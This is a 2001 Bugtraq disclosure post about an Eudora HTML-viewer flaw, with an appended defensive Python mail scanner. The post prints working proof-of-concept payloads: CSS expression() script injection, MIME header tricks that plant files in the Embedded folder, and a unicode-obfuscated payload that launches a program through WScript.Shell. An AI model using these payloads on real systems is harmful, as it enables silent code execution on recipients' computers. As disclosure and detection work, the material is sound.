[19749] in bugtraq
Re: feeble.you!dora.exploit
daemon@ATHENA.MIT.EDU (http-equiv@excite.com)
Wed Mar 21 16:23:57 2001
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <10359935.985189714218.JavaMail.imail@slippery>
Date: Wed, 21 Mar 2001 07:48:28 -0800
Reply-To: http-equiv@excite.com
From: "http-equiv@excite.com" <http-equiv@excite.com>
To: BUGTRAQ@SECURITYFOCUS.COM
Further to all of this, we include a generic more illustrative (and user
friendly test working example) [at the end of this batch of quotes].
This defeats the so-called "Allow executables in HTML content" being
disabled.
Example at the end of this screed.
On Tue, 20 Mar 2001 11:23:48 -0800 (PST), http-equiv@excite.com wrote:
| |Jeff Beckley wrote:
| |
| |>At 01:38 AM 3/18/2001 -0800, http-equiv@excite.com wrote:
| |>Silent delivery and installation of an executable on a target
| |>computer. No client input other than opening an email using
| |>Eudora 5.02 - Sponsored Mode provided 'use Microsoft viewer'
| |>and 'allow executables in HTML content' are enabled.
| |
| |
| |The "Allow executables in HTML content" setting is turned off by
| |default. The online help and user manual mention that the
| |setting should remain off for security reasons.
|
| This of course is 100% correct. Unfortunately on closer examination
| we find that this too can be defeated quite easily. Consider the
| following non-JavaScript:
|
|
| <!doctype html public "-//w3c//dtd html 4.0 transitional//en">
|
| <img
| SRC="file://C:\WINDOWS\APPLIC~1\QUALCOMM\EUDORA\Embedded\malware.gif"
| height=2 width=2
| STYLE="left:expression(location.href='http://www.malware.com');"></html>
|
| <br>
| <br>
| </body></html>
|
| This slips through, with "Allow executables in HTML content" disabled.
| Therefore the results will be the same:
|
| <img SRC="" height=1 width=1
| STYLE="left:expression (malware.location.href='cid:malware.com');"></
|
| ...etc
|
| Disable the 'Microsoft Viewer" thing. That's the problem.
|
| A good repair can be by reviewing all the necessary tricks to inject
| JavaScript into Hotmail Accounts. These are well documented here and
| dating back for quite some time. It appears the mail client seeks typical
| script tags, which is defeated as above. Additionally you might want to
| not allow a crafted inline file to transfer automatically to your
| embedded folder:
|
| Content-Type: application/octet-stream; charset=iso-8859-1
| Content-ID: <malware.com>
| Content-Transfer-Encoding: base64
| Content-Disposition: inline; filename="You!DORA.html"
|
| We note that if the content-type is manipulated we can route the file to
| the 'Embedded' folder. Casual observation suggests image files and *.exe
| are routed there. While *.html is not, hence the constructed Content-Type:
| application/octet-stream; charset=iso-8859-1 while the file is:
| Content-Disposition: inline; filename="You!DORA.html"
|
|
| ---
| http://www.malware.com
|
|
This is specifically constructed to fire the ActiveX warning so that it is
visually illustrated (harmless WSH to fire telnet if you click okay)
REPEAT: this is by design and only for illustrative purposes (lest some
idiot complain this demo has a warning and is a lame "exploit").
<img SRC="cid:malware.com" height=2 width=2
STYLE="left:expression(document.write('\u0020\u0020\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u0076\u0061\u0072\u0020\u0077\u0073\u0068\u003d\u006e\u0065\u0077\u0020\u0041\u0063\u0074\u0069\u0076\u0065\u0058\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0027\u0057\u0053\u0063\u0072\u0069\u0070\u0074\u002e\u0053\u0068\u0065\u006c\u006c\u0027\u0029\u003b\u0020\u0020\u0077\u0073\u0068\u002e\u0052\u0075\u006e\u0028\u0027\u0074\u0065\u006c\u006e\u0065\u0074\u002e\u0065\u0078\u0065\u0027\u0029\u003b\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u003c\u0021\u002d\u002d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u006d\u0061\u006c\u0077\u0061\u0072\u0065\u002e\u0063\u006f\u006d\u0020\u0032\u0032\u002e\u0030\u0032\u002e\u0030\u0031\u0020\u002d\u002d\u003e'))">
Once again:
Tested on win98, IE5.5, "Eudora 5.0.2 -- Sponsored Mode", "Microsoft Viewer"
enabled, "Allow executables in HTML content" DISABLED.
end call
---
http://www.malware.com
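[Editor's added example, not part of the original post.] The two defender-side checks the thread points at are (1) script smuggled through a CSS expression() in a STYLE attribute, which a filter that only looks for <script> tags misses, and (2) an inline part whose declared Content-Type (application/octet-stream) disagrees with its .html filename. The following mail-gateway check is example code written for this page, not Eudora's or anyone's shipping filter; the sample message is constructed here to mirror the headers quoted above.

```python
import re
from email import message_from_string
from email.message import Message
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# CSS expression() inside a style attribute; tolerates mixed case and the
# "expression (" spacing variant seen in the post.
_EXPR_RE = re.compile(
    r'style\s*=\s*["\']?[^"\'>]*?expression\s*\(', re.IGNORECASE | re.DOTALL)

# Extensions whose declared MIME type we insist on (constructed policy table).
_EXPECTED = {"html": "text/html", "htm": "text/html", "gif": "image/gif"}


def find_css_expression(html: str) -> list:
    """Return every style attribute prefix that carries expression()."""
    return [m.group(0) for m in _EXPR_RE.finditer(html)]


def mime_type_mismatch(part: Message) -> bool:
    """True when the filename extension contradicts the Content-Type."""
    filename = (part.get_filename() or "").lower()
    if "." not in filename:
        return False
    ext = filename.rsplit(".", 1)[1]
    return ext in _EXPECTED and part.get_content_type() != _EXPECTED[ext]


def scan_message(raw: str) -> dict:
    """Walk every leaf part; flag expression() bodies and mismatched parts."""
    findings = {"expression": [], "mismatched": []}
    for part in message_from_string(raw).walk():
        if part.is_multipart():
            continue
        if mime_type_mismatch(part):
            findings["mismatched"].append(part.get_filename())
        body = part.get_payload(decode=True)  # base64/qp decoded for us
        if body:
            findings["expression"] += find_css_expression(
                body.decode("latin-1", "replace"))
    return findings


def build_sample() -> str:
    """Constructed message shaped like the one quoted in the post."""
    msg = MIMEMultipart("related")
    html = ('<img SRC="cid:malware.com" height=2 width=2 '
            'STYLE="left:expression (document.write(\'demo\'))">')
    msg.attach(MIMEText(html, "html"))
    part = MIMEApplication(b"<html></html>", "octet-stream",
                           charset="iso-8859-1")  # base64 by default
    part.add_header("Content-ID", "<malware.com>")
    part.add_header("Content-Disposition", "inline", filename="You!DORA.html")
    msg.attach(part)
    return msg.as_string()
```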